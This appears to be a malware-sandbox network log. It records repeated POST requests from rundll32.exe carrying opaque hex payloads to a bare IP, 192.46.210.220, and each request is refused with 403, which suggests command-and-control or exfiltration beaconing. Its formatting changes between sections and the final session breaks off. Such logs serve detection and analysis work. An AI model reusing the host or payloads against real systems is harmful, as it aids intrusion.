2021-10-28 03:09:19 UTC | 349 | OUT | Data Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:09:20 UTC | 359 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:09:19 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
71 | 192.168.2.4 | 50139 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:09:19 UTC | 354 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4865
Connection: Close
Cache-Control: no-cache
2021-10-28 03:09:19 UTC | 354 | OUT | Data Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:09:20 UTC | 359 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:09:20 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
72 | 192.168.2.4 | 50146 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:09:23 UTC | 359 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4853
Connection: Close
Cache-Control: no-cache
2021-10-28 03:09:23 UTC | 359 | OUT | Data Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:09:23 UTC | 369 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:09:23 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
73 | 192.168.2.4 | 50147 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:09:23 UTC | 364 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4865
Connection: Close
Cache-Control: no-cache
2021-10-28 03:09:23 UTC | 364 | OUT | Data Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:09:24 UTC | 369 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:09:24 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
74 | 192.168.2.4 | 50154 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:09:27 UTC | 369 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4853
Connection: Close
Cache-Control: no-cache
2021-10-28 03:09:27 UTC | 369 | OUT | Data Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:09:27 UTC | 379 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:09:27 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      75192.168.2.450155192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:09:27 UTC374OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
Timestamp: 2021-10-28 03:09:27 UTC | kBytes transferred: 379 | Direction: IN | Data: HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:09:27 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 76 | Source IP: 192.168.2.4 | Source Port: 50162 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp: 2021-10-28 03:09:30 UTC | kBytes transferred: 379 | Direction: OUT | Data: POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4853
Connection: Close
Cache-Control: no-cache
Timestamp: 2021-10-28 03:09:31 UTC | kBytes transferred: 389 | Direction: IN | Data: HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:09:31 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 77 | Source IP: 192.168.2.4 | Source Port: 50163 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp: 2021-10-28 03:09:31 UTC | kBytes transferred: 384 | Direction: OUT | Data: POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4865
Connection: Close
Cache-Control: no-cache
Timestamp: 2021-10-28 03:09:31 UTC | kBytes transferred: 389 | Direction: IN | Data: HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:09:31 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 78 | Source IP: 192.168.2.4 | Source Port: 50170 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp: 2021-10-28 03:09:34 UTC | kBytes transferred: 389 | Direction: OUT | Data: POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4853
Connection: Close
Cache-Control: no-cache
Timestamp: 2021-10-28 03:09:35 UTC | kBytes transferred: 399 | Direction: IN | Data: HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:09:35 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 79 | Source IP: 192.168.2.4 | Source Port: 50171 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp: 2021-10-28 03:09:34 UTC | kBytes transferred: 394 | Direction: OUT | Data: POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4865
Connection: Close
Cache-Control: no-cache
Timestamp: 2021-10-28 03:09:35 UTC | kBytes transferred: 399 | Direction: IN | Data: HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:09:35 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 8 | Source IP: 192.168.2.4 | Source Port: 49817 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp: 2021-10-28 03:07:18 UTC | kBytes transferred: 39 | Direction: OUT | Data: POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4865
Connection: Close
Cache-Control: no-cache
Timestamp: 2021-10-28 03:07:18 UTC | kBytes transferred: 49 | Direction: IN | Data: HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:07:18 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 80 | Source IP: 192.168.2.4 | Source Port: 50178 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp: 2021-10-28 03:09:38 UTC | kBytes transferred: 399 | Direction: OUT | Data: POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4853
Connection: Close
Cache-Control: no-cache
Timestamp: 2021-10-28 03:09:39 UTC | kBytes transferred: 409 | Direction: IN | Data: HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:09:39 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 81 | Source IP: 192.168.2.4 | Source Port: 50179 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp: 2021-10-28 03:09:38 UTC | kBytes transferred: 404 | Direction: OUT | Data: POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4865
Connection: Close
Cache-Control: no-cache
Timestamp: 2021-10-28 03:09:39 UTC | kBytes transferred: 409 | Direction: IN | Data: HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:09:39 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 82 | Source IP: 192.168.2.4 | Source Port: 50186 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp: 2021-10-28 03:09:42 UTC | kBytes transferred: 409 | Direction: OUT | Data: POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4853
Connection: Close
Cache-Control: no-cache
Timestamp: 2021-10-28 03:09:42 UTC | kBytes transferred: 419 | Direction: IN | Data: HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:09:42 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 83 | Source IP: 192.168.2.4 | Source Port: 50187 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp: 2021-10-28 03:09:42 UTC | kBytes transferred: 414 | Direction: OUT | Data: POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4865
Connection: Close
Cache-Control: no-cache
Timestamp: 2021-10-28 03:09:43 UTC | kBytes transferred: 419 | Direction: IN | Data: HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:09:43 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 84 | Source IP: 192.168.2.4 | Source Port: 50193 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp: 2021-10-28 03:09:46 UTC | kBytes transferred: 419 | Direction: OUT | Data: POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4853
Connection: Close
Cache-Control: no-cache
Timestamp: 2021-10-28 03:09:47 UTC | kBytes transferred: 429 | Direction: IN | Data: HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:09:47 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 85 | Source IP: 192.168.2.4 | Source Port: 50195 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp: 2021-10-28 03:09:47 UTC | kBytes transferred: 424 | Direction: OUT | Data: POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4865
Connection: Close
Cache-Control: no-cache
                                                                                                      2021-10-28 03:09:48 UTC429INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:09:47 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


Session ID: 86 | Source IP: 192.168.2.4 | Source Port: 50201 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe

[2021-10-28 03:09:50 UTC] kBytes transferred: 429, direction: OUT
POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4853
Connection: Close
Cache-Control: no-cache
[2021-10-28 03:09:50 UTC] kBytes transferred: 429, direction: OUT
Data Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
[2021-10-28 03:09:51 UTC] kBytes transferred: 434, direction: IN
HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:09:51 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 87 | Source IP: 192.168.2.4 | Source Port: 50203 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe

[2021-10-28 03:09:51 UTC] kBytes transferred: 434, direction: OUT
POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4865
Connection: Close
Cache-Control: no-cache
[2021-10-28 03:09:51 UTC] kBytes transferred: 434, direction: OUT
Data Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
[2021-10-28 03:09:51 UTC] kBytes transferred: 439, direction: IN
HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:09:51 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 88 | Source IP: 192.168.2.4 | Source Port: 50209 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe

[2021-10-28 03:09:54 UTC] kBytes transferred: 439, direction: OUT
POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4853
Connection: Close
Cache-Control: no-cache
[2021-10-28 03:09:54 UTC] kBytes transferred: 439, direction: OUT
Data Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
[2021-10-28 03:09:54 UTC] kBytes transferred: 444, direction: IN
HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:09:54 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 89 | Source IP: 192.168.2.4 | Source Port: 50211 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe

[2021-10-28 03:09:55 UTC] kBytes transferred: 444, direction: OUT
POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4865
Connection: Close
Cache-Control: no-cache
[2021-10-28 03:09:55 UTC] kBytes transferred: 444, direction: OUT
Data Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
[2021-10-28 03:09:55 UTC] kBytes transferred: 449, direction: IN
HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:09:55 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 9 | Source IP: 192.168.2.4 | Source Port: 49818 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe

[2021-10-28 03:07:18 UTC] kBytes transferred: 44, direction: OUT
POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4853
Connection: Close
Cache-Control: no-cache
[2021-10-28 03:07:18 UTC] kBytes transferred: 44, direction: OUT
Data Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
[2021-10-28 03:07:19 UTC] kBytes transferred: 49, direction: IN
HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:07:19 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 90 | Source IP: 192.168.2.4 | Source Port: 50217 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe

[2021-10-28 03:09:57 UTC] kBytes transferred: 449, direction: OUT
POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4853
Connection: Close
Cache-Control: no-cache
[2021-10-28 03:09:57 UTC] kBytes transferred: 449, direction: OUT
Data Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
